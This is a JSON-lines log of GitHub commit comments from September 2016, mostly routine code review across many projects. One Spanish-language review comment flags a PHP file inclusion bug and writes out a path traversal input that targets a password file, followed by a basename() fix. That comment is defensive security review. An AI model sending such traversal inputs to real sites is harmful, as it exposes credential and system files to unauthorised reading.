{"id":"4577875858","type":"CommitCommentEvent","actor":{"login":"TestUE4byNurlan"},"repo":{"name":"TestUE4byNurlan/test2"},"payload":{"comment":{"id":19064552,"position":null,"line":null,"path":null,"commit_id":"93341d4059984ffc0aac2db06abb828464faf96c","created_at":"2016-09-17T12:24:20Z","updated_at":"2016-09-17T12:24:20Z","body":"commentirovanie"}},"created_at":"2016-09-17T12:24:20Z"}
{"id":"4577878446","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19064556,"position":null,"line":null,"path":null,"commit_id":"46f91ef3c1873f347dd8ccc6afd21202e8980dc1","created_at":"2016-09-17T12:26:30Z","updated_at":"2016-09-17T12:26:30Z","body":"This makes touchscreen and keyboard work (according to @mattdevo). If there are more options needed for other hardware, they can be added in another PR."}},"created_at":"2016-09-17T12:26:30Z"}
{"id":"4577879595","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064557,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T12:27:32Z","updated_at":"2016-09-17T12:27:32Z","body":"The goal was to be consistent with BodyExtractor."}},"created_at":"2016-09-17T12:27:32Z"}
{"id":"4577882784","type":"CommitCommentEvent","actor":{"login":"topskyca"},"repo":{"name":"alexander-emelyanov/opteck-api-client"},"payload":{"comment":{"id":19064559,"position":null,"line":null,"path":null,"commit_id":"443dc2bed1b64b1f0f642cc92450f1abbe4bd57e","created_at":"2016-09-17T12:30:17Z","updated_at":"2016-09-17T12:30:17Z","body":"hey Alexander , can I hire you for an ongoing API project for binary options platform? If you are interested, please contact skype: topskyca - thanks very much! Hope I can hear from you."}},"created_at":"2016-09-17T12:30:17Z"}
{"id":"4577883516","type":"CommitCommentEvent","actor":{"login":"jwatzman"},"repo":{"name":"kkos/oniguruma"},"payload":{"comment":{"id":19064560,"position":5,"line":367,"path":"src/oniguruma.h","commit_id":"c4be742e20cd74db2fa7aa4360172183b2b8169e","created_at":"2016-09-17T12:30:54Z","updated_at":"2016-09-17T12:30:54Z","body":"Shouldn't this be `OnigUChar` instead of `UChar`?"}},"created_at":"2016-09-17T12:30:54Z"}
{"id":"4577883865","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064561,"position":200,"line":200,"path":"termcase.module","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:31:11Z","updated_at":"2016-09-17T12:31:11Z","body":"Thank you. Fixed."}},"created_at":"2016-09-17T12:31:11Z"}
{"id":"4577884016","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064562,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:31:20Z","updated_at":"2016-09-17T12:31:20Z","body":"Done."}},"created_at":"2016-09-17T12:31:20Z"}
{"id":"4577884091","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064563,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:31:24Z","updated_at":"2016-09-17T12:31:24Z","body":"Removed."}},"created_at":"2016-09-17T12:31:24Z"}
{"id":"4577886750","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064565,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:33:36Z","updated_at":"2016-09-17T12:33:36Z","body":"Resolved."}},"created_at":"2016-09-17T12:33:36Z"}
{"id":"4577888326","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19064566,"position":null,"line":null,"path":null,"commit_id":"92f01aa2bd2b4e9644323cdbef8621682605660d","created_at":"2016-09-17T12:34:53Z","updated_at":"2016-09-17T12:34:53Z","body":"The warning may be silly in this case but in other cases may be very useful to catch subtle bugs, moreover the original version is not idiomatic and actually it is very rare. It is much more common the case with ==, so a reader could reasonably wonder if 'mainThread->easyMovePlayed = doEasyMove' it is actually intended or it is a bug....now the reader does not wonder anymore :-)\r\n"}},"created_at":"2016-09-17T12:34:53Z"}
{"id":"4577891757","type":"CommitCommentEvent","actor":{"login":"calvinmetcalf"},"repo":{"name":"crypto-browserify/timing-safe-equal"},"payload":{"comment":{"id":19064568,"position":31,"line":31,"path":"test.js","commit_id":"87571dcaabc094bed9ae4c967525f929770c7cd1","created_at":"2016-09-17T12:37:43Z","updated_at":"2016-09-17T12:37:43Z","body":"cool thanks"}},"created_at":"2016-09-17T12:37:43Z"}
{"id":"4577892564","type":"CommitCommentEvent","actor":{"login":"anuprulez"},"repo":{"name":"bgruening/galaxy"},"payload":{"comment":{"id":19064571,"position":null,"line":null,"path":null,"commit_id":"123aa562c0878406eb0eaa16eb857661da63996c","created_at":"2016-09-17T12:38:23Z","updated_at":"2016-09-17T12:38:23Z","body":"@guerler @bgruening I have made changes to Manage User Information page especially in user addresses. I used Radio buttons for operations like Edit, Delete and Undelete. The forms' inputs are built at the server. "}},"created_at":"2016-09-17T12:38:23Z"}
{"id":"4577893493","type":"CommitCommentEvent","actor":{"login":"BertramKranz"},"repo":{"name":"BertramKranz/swagger-ui"},"payload":{"comment":{"id":19064575,"position":null,"line":null,"path":null,"commit_id":"a98f891829a41507f7a0360b3b3f17921ffda8f1","created_at":"2016-09-17T12:39:04Z","updated_at":"2016-09-17T12:39:04Z","body":"Merged"}},"created_at":"2016-09-17T12:39:04Z"}
{"id":"4577896848","type":"CommitCommentEvent","actor":{"login":"cmudevops"},"repo":{"name":"cmudevops/hello-world"},"payload":{"comment":{"id":19064577,"position":5,"line":3,"path":"README.md","commit_id":"7f988155a96e2a62893f4734d8d6bf7ad92c997b","created_at":"2016-09-17T12:41:44Z","updated_at":"2016-09-17T12:41:44Z","body":"editing on the branch"}},"created_at":"2016-09-17T12:41:44Z"}
{"id":"4577897691","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19064579,"position":4,"line":187,"path":"package.json","commit_id":"5bb9dee4c60eb8295b6215b73536c200ff1daf5b","created_at":"2016-09-17T12:42:23Z","updated_at":"2016-09-17T12:42:23Z","body":"FYI v2 _should_ be backwards compatible with v1. It just adds more es5 features to the browser."}},"created_at":"2016-09-17T12:42:23Z"}
{"id":"4577897873","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064580,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T12:42:31Z","updated_at":"2016-09-17T12:42:31Z","body":"Hmmmm.... we're talking about the English language here. So we can't really count on _consistency_ with regard to any spelling rules. ;)\r\n\r\nAs a native speaker, \"insertor\" just looks wrong. Besides, neither Merriam Webster nor the Oxford English dictionary considers that to be a word (at least not the online versions).\r\n\r\nTake that for what it's worth."}},"created_at":"2016-09-17T12:42:31Z"}
{"id":"4577898955","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19064582,"position":10,"line":441,"path":"src/position.cpp","commit_id":"066447c24f4339ab37566a1cbbde2a390f16a94e","created_at":"2016-09-17T12:43:24Z","updated_at":"2016-09-17T12:43:24Z","body":"Well, I meant to completely drop defensive and use instead\r\n\r\n`if (b & pieces(color_of(piece_on(s))))`\r\n\r\nBut for the LTC it's ok :-)\r\n"}},"created_at":"2016-09-17T12:43:24Z"}
{"id":"4577899219","type":"CommitCommentEvent","actor":{"login":"newman-xu"},"repo":{"name":"sixeyed/dashing.net"},"payload":{"comment":{"id":19064583,"position":null,"line":null,"path":null,"commit_id":"9093f6b074e744e8b673e825be3968aba1f6649b","created_at":"2016-09-17T12:43:36Z","updated_at":"2016-09-17T12:43:36Z","body":"Hi \r\nHow can I make it to support IE? Do you have any suggestion for it? I knew the super dashboard framework because of your course Real World Big Data in Azure, but we need it to support IE as well. "}},"created_at":"2016-09-17T12:43:36Z"}
{"id":"4577900156","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"SlimRoms/frameworks_opt_slim"},"payload":{"comment":{"id":19064584,"position":null,"line":null,"path":null,"commit_id":"da6dd1be2312b8ed5ed8bac621a1f979a2a677f4","created_at":"2016-09-17T12:44:21Z","updated_at":"2016-09-17T12:44:21Z","body":"Want to be more specific there chief? Vibration problem on what device under what circumstances? "}},"created_at":"2016-09-17T12:44:21Z"}
{"id":"4577902437","type":"CommitCommentEvent","actor":{"login":"xiaofu18"},"repo":{"name":"xiaofu18/mytest1"},"payload":{"comment":{"id":19064587,"position":null,"line":null,"path":null,"commit_id":"ea6897410a3e822f507e76efe825a17079110ea1","created_at":"2016-09-17T12:46:11Z","updated_at":"2016-09-17T12:46:11Z","body":"上传文件之后"}},"created_at":"2016-09-17T12:46:11Z"}
{"id":"4577904992","type":"CommitCommentEvent","actor":{"login":"ijspizza"},"repo":{"name":"MitchZinck/SkypeDestroyer"},"payload":{"comment":{"id":19064592,"position":null,"line":null,"path":null,"commit_id":"36629be40adcc580ee99b709e00337413a646f51","created_at":"2016-09-17T12:48:14Z","updated_at":"2016-09-17T12:48:14Z","body":"Cool it's back working again"}},"created_at":"2016-09-17T12:48:14Z"}
{"id":"4577905667","type":"CommitCommentEvent","actor":{"login":"losh11"},"repo":{"name":"LitecoinNode/bootstrap.litecoinnode.org"},"payload":{"comment":{"id":19064593,"position":null,"line":null,"path":null,"commit_id":"67bea8c6630692a1090e8bfc3a5b67765d458f24","created_at":"2016-09-17T12:48:47Z","updated_at":"2016-09-17T12:48:47Z","body":"Thanks :)"}},"created_at":"2016-09-17T12:48:47Z"}
{"id":"4577906755","type":"CommitCommentEvent","actor":{"login":"sjmcdowall"},"repo":{"name":"sindresorhus/camelcase-keys"},"payload":{"comment":{"id":19064594,"position":null,"line":null,"path":null,"commit_id":"94195701442b3ab257d17596a689780656a172ec","created_at":"2016-09-17T12:49:42Z","updated_at":"2016-09-17T12:49:42Z","body":"Oh wow -- very nice!  The only thing I would not have done is change the version # to 4.0.0.  This isn't a break change at all -- but now a npm update won't update this module because of the high level version # change. <shrug> "}},"created_at":"2016-09-17T12:49:42Z"}
{"id":"4577909562","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"romhackhispano/klint-psk.romhackhispano.org"},"payload":{"comment":{"id":19064597,"position":5,"line":5,"path":"content.php","commit_id":"c0720825444df4af7589d6bd56ac6fa9c6a110be","created_at":"2016-09-17T12:51:59Z","updated_at":"2016-09-17T12:51:59Z","body":"Fallaco de seguridad. Muy típico en PHP.\r\n\r\n¿Qué pasa si te mandan?\r\n`pg=../../../../.passwd%00`\r\n\r\n¿O si acceden a `pg=../otrodominioderomhackhispanoconsubidashabilitadas/uploads/uploaded_malicious_script`?"}},"created_at":"2016-09-17T12:51:59Z"}
{"id":"4577910279","type":"CommitCommentEvent","actor":{"login":"HughParsonage"},"repo":{"name":"HughParsonage/grattan"},"payload":{"comment":{"id":19064599,"position":32,"line":35,"path":"R/weighted_ntile.R","commit_id":"63defe67113b5c4dceaa57dbc6ca55173f0583bc","created_at":"2016-09-17T12:52:24Z","updated_at":"2016-09-17T12:52:24Z","body":"This closes #26 "}},"created_at":"2016-09-17T12:52:24Z"}
{"id":"4577910674","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"romhackhispano/klint-psk.romhackhispano.org"},"payload":{"comment":{"id":19064602,"position":5,"line":5,"path":"content.php","commit_id":"c0720825444df4af7589d6bd56ac6fa9c6a110be","created_at":"2016-09-17T12:52:43Z","updated_at":"2016-09-17T12:52:43Z","body":"Solución:\r\n```\r\n$page = \"pages/\". $_GET[\"pg\"].\".php\";\r\n```\r\n-->\r\n```\r\n$page = \"pages/\". basename($_GET[\"pg\"]).\".php\";\r\n```"}},"created_at":"2016-09-17T12:52:43Z"}
{"id":"4577911984","type":"CommitCommentEvent","actor":{"login":"bingo20145"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19064603,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-17T12:53:51Z","updated_at":"2016-09-17T12:53:51Z","body":"@hldai 你好，又打扰你了，我看到一篇论文The ZJU-EDL System for Entity Discovery and Linking at TAC KBP2015是你写的吗，可以和你交流一下吗？我的qq：646902103"}},"created_at":"2016-09-17T12:53:51Z"}
{"id":"4577912511","type":"CommitCommentEvent","actor":{"login":"fayizan"},"repo":{"name":"G047/Agar.io-Bots"},"payload":{"comment":{"id":19064604,"position":null,"line":null,"path":null,"commit_id":"115703a1b65bca49b51a1d29eb2322a262579acd","created_at":"2016-09-17T12:54:17Z","updated_at":"2016-09-17T12:54:17Z","body":"lol u gonna sell"}},"created_at":"2016-09-17T12:54:17Z"}
{"id":"4577917688","type":"CommitCommentEvent","actor":{"login":"FlameFractal"},"repo":{"name":"hasura-imad/imad-2016-app"},"payload":{"comment":{"id":19064609,"position":7,"line":7,"path":"index.html","commit_id":"94f80fa6ff6f5e33bc44374e875d58ef0606b6b5","created_at":"2016-09-17T12:58:27Z","updated_at":"2016-09-17T12:58:27Z","body":"Haha:p"}},"created_at":"2016-09-17T12:58:27Z"}
{"id":"4577920676","type":"CommitCommentEvent","actor":{"login":"pthom"},"repo":{"name":"Dovyski/cvui"},"payload":{"comment":{"id":19064612,"position":null,"line":null,"path":null,"commit_id":"a0d89bda66a602b079f70b549300eba1ec67f0a2","created_at":"2016-09-17T13:00:38Z","updated_at":"2016-09-17T13:00:38Z","body":"Great idea !\r\n\r\nJust to help you, some advices here : https://github.com/Dovyski/cvui/compare/dev...pthom:cmake_improvements?expand=1\r\n\r\nBasically, you need to\r\n- switch to ubuntu 14 (cmake version 2.8.12 or higher is required, this is the easiest way to get it)\r\n- tell gcc to use the C++11 standard\r\n\r\nHope this helps !\r\n\r\n\r\nNote : \r\nyou can use cmake on windows too. It will generate the  sln solution from the CMakeLists.txt files.\r\n\r\nQuick instructions : \r\n\r\n- Download and install cmake from https://cmake.org/download/  (when installing, check the option \"Add CMake to the system path\")\r\n- Create a build folder that is different from the source folder\r\nFor example :\r\n````\r\ncd YourDevelopmentFolder\r\n# git clone or move your development folder here\r\nmkdir cvui_devel\r\ncd cvui_devel\r\ngit clone git@github.com:Dovyski/cvui.git \r\nmkdir build\r\n````\r\n\r\n\r\nRun cmake\r\n\r\nMethod 1 : with the command line: \r\n````\r\ncd where_cvui_source_is_installed\r\ncd build\r\ncmake ../cvui -DOpenCV_DIR=Where_Opencv_is_installed -DCMAKE_INSTALL_PREFIX=../install\r\n````\r\n\r\nMethod 2 : with cmake GUI\r\nRun cmake and fill the source code and build directory, then click Configure/generate\r\nYour folder should now look like\r\n````\r\nYourDevelopmentFolder\r\n├───build\r\n│   ├───bin\r\n│   │   ├───Debug\r\n│   │   └───Release\r\n│   ├───cvui.sln\r\n├───cvui\r\n└───install\r\n````\r\n\r\n\r\nThen, open YourDevelopmentFolder\\build\\cvui.sln\r\n\r\n"}},"created_at":"2016-09-17T13:00:38Z"}
{"id":"4577923028","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19064620,"position":null,"line":null,"path":null,"commit_id":"6bad69434a1ffe2a31df882e821ab0eaa6db66e9","created_at":"2016-09-17T13:02:13Z","updated_at":"2016-09-17T13:02:13Z","body":"添加个SQL脚本，以后终究是要通过数据库来管理数据的"}},"created_at":"2016-09-17T13:02:13Z"}
{"id":"4577923177","type":"CommitCommentEvent","actor":{"login":"RogerFederer03"},"repo":{"name":"rod-lin/ivm"},"payload":{"comment":{"id":19064622,"position":null,"line":null,"path":null,"commit_id":"9fe8bbc29a6737970d21f4851f2ea847ca743e7e","created_at":"2016-09-17T13:02:22Z","updated_at":"2016-09-17T13:02:22Z","body":"发现你每天更新这个repo，好厉害啊，我上班工作都干不完，别说学习其他的了"}},"created_at":"2016-09-17T13:02:22Z"}
{"id":"4577923373","type":"CommitCommentEvent","actor":{"login":"leeight"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19064623,"position":38,"line":130,"path":"ReactCommon/bridge/JSCExecutor.cpp","commit_id":"779314a413851e7ae3d9ff483ba6421f1eb33630","created_at":"2016-09-17T13:02:31Z","updated_at":"2016-09-17T13:02:31Z","body":"Call `delegate->moduleNames()` twice?"}},"created_at":"2016-09-17T13:02:31Z"}
{"id":"4577923581","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/camelcase-keys"},"payload":{"comment":{"id":19064624,"position":null,"line":null,"path":null,"commit_id":"94195701442b3ab257d17596a689780656a172ec","created_at":"2016-09-17T13:02:43Z","updated_at":"2016-09-17T13:02:43Z","body":"This is not, but the new version does contain a breaking change. Look at the commit history."}},"created_at":"2016-09-17T13:02:43Z"}
{"id":"4577923784","type":"CommitCommentEvent","actor":{"login":"nitincchauhan"},"repo":{"name":"brettwooldridge/HikariCP"},"payload":{"comment":{"id":19064625,"position":null,"line":null,"path":null,"commit_id":"5e05adcd27ceeaa4b6b5a23930505f99ff3b0644","created_at":"2016-09-17T13:02:54Z","updated_at":"2016-09-17T13:02:54Z","body":"If I understand above, lastConnectionFailure is to report any exception while creating new connection only,\r\nin that case please remove setting exception in alive check here: https://github.com/brettwooldridge/HikariCP/blob/dev/src/main/java/com/zaxxer/hikari/pool/PoolBase.java#L171\r\n\r\nAlso in createTimeoutException, probably setting nextException is redundant and polluting logs because 'cause is already set before, with nextException' anyway and printing exception neatly prints cause, as ...caused by..."}},"created_at":"2016-09-17T13:02:54Z"}
{"id":"4577924976","type":"CommitCommentEvent","actor":{"login":"Teresa-King"},"repo":{"name":"Teresa-King/ProgrammingAssignment2"},"payload":{"comment":{"id":19064629,"position":34,"line":19,"path":"cachematrix.R","commit_id":"00083c131e27a03eabb83cbbf64b380421d00b90","created_at":"2016-09-17T13:03:55Z","updated_at":"2016-09-17T13:03:55Z","body":"This should read holder <- solve(x) (oops!)"}},"created_at":"2016-09-17T13:03:55Z"}
{"id":"4577925265","type":"CommitCommentEvent","actor":{"login":"BerniWittmann"},"repo":{"name":"BerniWittmann/spielplanismaning"},"payload":{"comment":{"id":19064630,"position":null,"line":null,"path":null,"commit_id":"4a37dbaf3ca235a760c1a0b5040c6ecbc8e5aad4","created_at":"2016-09-17T13:04:08Z","updated_at":"2016-09-17T13:04:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CKpoQ7jF&#x2F;137-0-5-auth-service-tokenname\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (0.5) auth Service TokenName</a>"}},"created_at":"2016-09-17T13:04:08Z"}
{"id":"4577927963","type":"CommitCommentEvent","actor":{"login":"fdsafdsaf"},"repo":{"name":"fdsafdsaf/site.loc"},"payload":{"comment":{"id":19064633,"position":2,"line":2,"path":"fdsa.php","commit_id":"2dacd05017d76658986a8c5a4a18786c6125664c","created_at":"2016-09-17T13:05:31Z","updated_at":"2016-09-17T13:05:31Z","body":"ннн"}},"created_at":"2016-09-17T13:05:31Z"}
{"id":"4577928628","type":"CommitCommentEvent","actor":{"login":"marmarek"},"repo":{"name":"Whonix/control-port-filter-python"},"payload":{"comment":{"id":19064634,"position":222,"line":273,"path":"usr/sbin/cpfpd","commit_id":"e073189f6f96380b66b577d02cb6f87fe4761a82","created_at":"2016-09-17T13:06:03Z","updated_at":"2016-09-17T13:06:03Z","body":"This looks a bit weird - handling one side with `asyncore`, but the other one with direct `select` call. I think you can handle both with `asyncore` - it looks like `asyncore.dispatcher` can accept existing socket in `__init__` parameter.\r\nThis way you'll also not need that 1 sec timeout on each side."}},"created_at":"2016-09-17T13:06:03Z"}
{"id":"4577929479","type":"CommitCommentEvent","actor":{"login":"marmarek"},"repo":{"name":"Whonix/control-port-filter-python"},"payload":{"comment":{"id":19064635,"position":186,"line":232,"path":"usr/sbin/cpfpd","commit_id":"e073189f6f96380b66b577d02cb6f87fe4761a82","created_at":"2016-09-17T13:06:44Z","updated_at":"2016-09-17T13:06:44Z","body":"I think you need to keep a reference to this object somewhere (local variable?), otherwise garbage collector may release it."}},"created_at":"2016-09-17T13:06:44Z"}
{"id":"4577930485","type":"CommitCommentEvent","actor":{"login":"yamorad"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":19064637,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-17T13:07:31Z","updated_at":"2016-09-17T13:07:31Z","body":"[diccionario 17 -09-2016.pdf](https://github.com/carlosbalamba/MIKEBOL/files/478150/diccionario.17.-09-2016.pdf)\r\n![relacional 17 septiembre](https://cloud.githubusercontent.com/assets/20422315/18608402/c5d71f7c-7cad-11e6-844a-024270814470.png)\r\n"}},"created_at":"2016-09-17T13:07:31Z"}
{"id":"4577930760","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064638,"position":null,"line":null,"path":null,"commit_id":"0d004720aed2d2a36922bba3a46586b27449fdd5","created_at":"2016-09-17T13:07:44Z","updated_at":"2016-09-17T13:07:44Z","body":"Initial commit."}},"created_at":"2016-09-17T13:07:44Z"}
{"id":"4577932816","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19064639,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-17T13:09:20Z","updated_at":"2016-09-17T13:09:20Z","body":"@co5mo\r\nBohužel. Já jsem nic neměnil, toto je defaultní chování. Kdyby se to změnilo tak to nebude konzistentní s funkcí přidání jedné položky, která adresář samozřejmě taky vytváří. Pak by vznikaly duplicity a některý scraper by ani pořádně nešel nastavit tak aby pochopil, že v jednom hlavním adresáři je více filmů a přitom, že musí kontrolovat i podadresáře, které obsahují už ale jen jeden film.\r\nMimochodem kde jsi vzal, že bez adresářů je vytváření rychlejší? Na to že adresář se vytvářel vždy, tak jak jsi to porovnával? Navíc v mém případě se import všech položek provede snad během 2min, pridani posledních 200 z recently added trvá pár sekund.\r\nDle mne je přidání do knihovny až neuvěřitelně/p rekvapive rychlý, i na pomalejším internetu... nebavím se samozřejmě o scrapovaní samotných položek což je časově a datově náročné.\r\nTak mě napadá, zda to neporovnavas s nějakou starší verzí co importovala jen a pouze posledních 200 což jsem opravil tak, že teď umí importovat vše, což je přes 13000 položek, ale umí i pouze posledně přidané, což je jen těch 200.\r\n"}},"created_at":"2016-09-17T13:09:20Z"}
{"id":"4577933361","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":19064640,"position":null,"line":null,"path":null,"commit_id":"769ee85408ca23e200e019c08cd06321678e1532","created_at":"2016-09-17T13:09:44Z","updated_at":"2016-09-17T13:09:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;P4zXeG5O&#x2F;29-feature-add-keyboard-s-background-image-to-emoji-keyboard\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Add keyboard&#39;s background image to Emoji keyboard</a>"}},"created_at":"2016-09-17T13:09:44Z"}
{"id":"4577933861","type":"CommitCommentEvent","actor":{"login":"lennartj"},"repo":{"name":"mojohaus/jaxb2-maven-plugin"},"payload":{"comment":{"id":19064642,"position":null,"line":null,"path":null,"commit_id":"6ca093016f3b13a1398fe70ff57ed66292061e6d","created_at":"2016-09-17T13:10:08Z","updated_at":"2016-09-17T13:10:08Z","body":"Fixes #37 "}},"created_at":"2016-09-17T13:10:08Z"}
{"id":"4577937171","type":"CommitCommentEvent","actor":{"login":"lennartj"},"repo":{"name":"mojohaus/jaxb2-maven-plugin"},"payload":{"comment":{"id":19064645,"position":null,"line":null,"path":null,"commit_id":"6ca093016f3b13a1398fe70ff57ed66292061e6d","created_at":"2016-09-17T13:12:30Z","updated_at":"2016-09-17T13:12:30Z","body":"Fixes #25 "}},"created_at":"2016-09-17T13:12:30Z"}
{"id":"4577943417","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"CyanogenMod/android_device_cyanogen_msm8916-common"},"payload":{"comment":{"id":19064652,"position":null,"line":null,"path":null,"commit_id":"a2119cee4941b0cd5d8300483274c679038c813b","created_at":"2016-09-17T13:17:10Z","updated_at":"2016-09-17T13:17:10Z","body":"typo in media_codecs_msm8939.xml 309?"}},"created_at":"2016-09-17T13:17:10Z"}
{"id":"4577945530","type":"CommitCommentEvent","actor":{"login":"Kakifrucht"},"repo":{"name":"BanManagement/BanManager"},"payload":{"comment":{"id":19064655,"position":null,"line":null,"path":null,"commit_id":"0c7b4d81f331e360efa78f2bb4bb64792ca23dc8","created_at":"2016-09-17T13:18:53Z","updated_at":"2016-09-17T13:18:53Z","body":"Thank you!"}},"created_at":"2016-09-17T13:18:53Z"}
{"id":"4577945542","type":"CommitCommentEvent","actor":{"login":"wigy-opensource-developer"},"repo":{"name":"Fermat-ORG/rust-home-node"},"payload":{"comment":{"id":19064656,"position":null,"line":null,"path":null,"commit_id":"2af55a6ae89a8b54d9d70d1903f04b049273f29d","created_at":"2016-09-17T13:18:53Z","updated_at":"2016-09-17T13:18:53Z","body":"Now I did some other manual testing using the following commands: \r\n\r\n```\r\n$ telnet 192.168.17.14 3000\r\n$ telnet 192.168.17.14 3001\r\nTrying 192.168.17.14...\r\ntelnet: Unable to connect to remote host: Connection refused\r\n$ telnet 127.0.0.1 3000\r\n$ telnet 127.0.0.1 3001\r\n```\r\n\r\nI see this on the console running the deamon:\r\n\r\n```\r\n$ ./run.sh\r\nINFO:iop_home_d: Binding port 0.0.0.0:3000\r\nINFO:iop_home_d: Binding port 127.0.0.1:3001\r\nINFO:iop_home_d: Accepting connection on 0.0.0.0:3000\r\nDEBUG:iop_home_d: Connection from V4(192.168.17.14:57462)\r\nINFO:iop_home_d: Accepting connection on 0.0.0.0:3000\r\nDEBUG:iop_home_d: Connection from V4(127.0.0.1:58734)\r\nINFO:iop_home_d: Accepting connection on 127.0.0.1:3001\r\nDEBUG:iop_home_d: Connection from V4(127.0.0.1:35472)\r\n^C\r\n```"}},"created_at":"2016-09-17T13:18:53Z"}
{"id":"4577946042","type":"CommitCommentEvent","actor":{"login":"fmoraless"},"repo":{"name":"fmoraless/sis_requerimientos"},"payload":{"comment":{"id":19064657,"position":null,"line":null,"path":null,"commit_id":"11918f5206e900aa151e6d37353a06bf2cd1752d","created_at":"2016-09-17T13:19:17Z","updated_at":"2016-09-17T13:19:17Z","body":"con esto se corrige el error que se estaba generando al crear las tareas."}},"created_at":"2016-09-17T13:19:17Z"}
{"id":"4577946185","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19064658,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-17T13:19:25Z","updated_at":"2016-09-17T13:19:25Z","body":"This results in a combination of an iSkin & a default screen:\r\n![iskin-radio-1](https://cloud.githubusercontent.com/assets/1040294/18608452/dd73a376-7ce9-11e6-9c09-5d243652955d.jpg)\r\nBe aware that in normal radio-mode \"ChannelSelectionRadio\" & \"InfoBarRadio\" are being displayed simultaneous."}},"created_at":"2016-09-17T13:19:25Z"}
{"id":"4577949662","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19064660,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-17T13:21:59Z","updated_at":"2016-09-17T13:21:59Z","body":"Забыл спросить на этот счёт во время занятия, а вы так и не ответили."}},"created_at":"2016-09-17T13:21:59Z"}
{"id":"4577949999","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":19064661,"position":null,"line":null,"path":null,"commit_id":"2c88163fd2ae0629aacf5838a100335d515ff5b5","created_at":"2016-09-17T13:22:12Z","updated_at":"2016-09-17T13:22:12Z","body":"Must we do the same for ````prefixes.php```` in the same folder?"}},"created_at":"2016-09-17T13:22:12Z"}
{"id":"4577955086","type":"CommitCommentEvent","actor":{"login":"str1py"},"repo":{"name":"str1py/AnastasiaAssistantProject"},"payload":{"comment":{"id":19064671,"position":3,"line":3,"path":"README.md","commit_id":"26cee9dbb4899e616e2f9b5a11130efe705091b8","created_at":"2016-09-17T13:25:54Z","updated_at":"2016-09-17T13:25:54Z","body":"Trying to add languages"}},"created_at":"2016-09-17T13:25:54Z"}
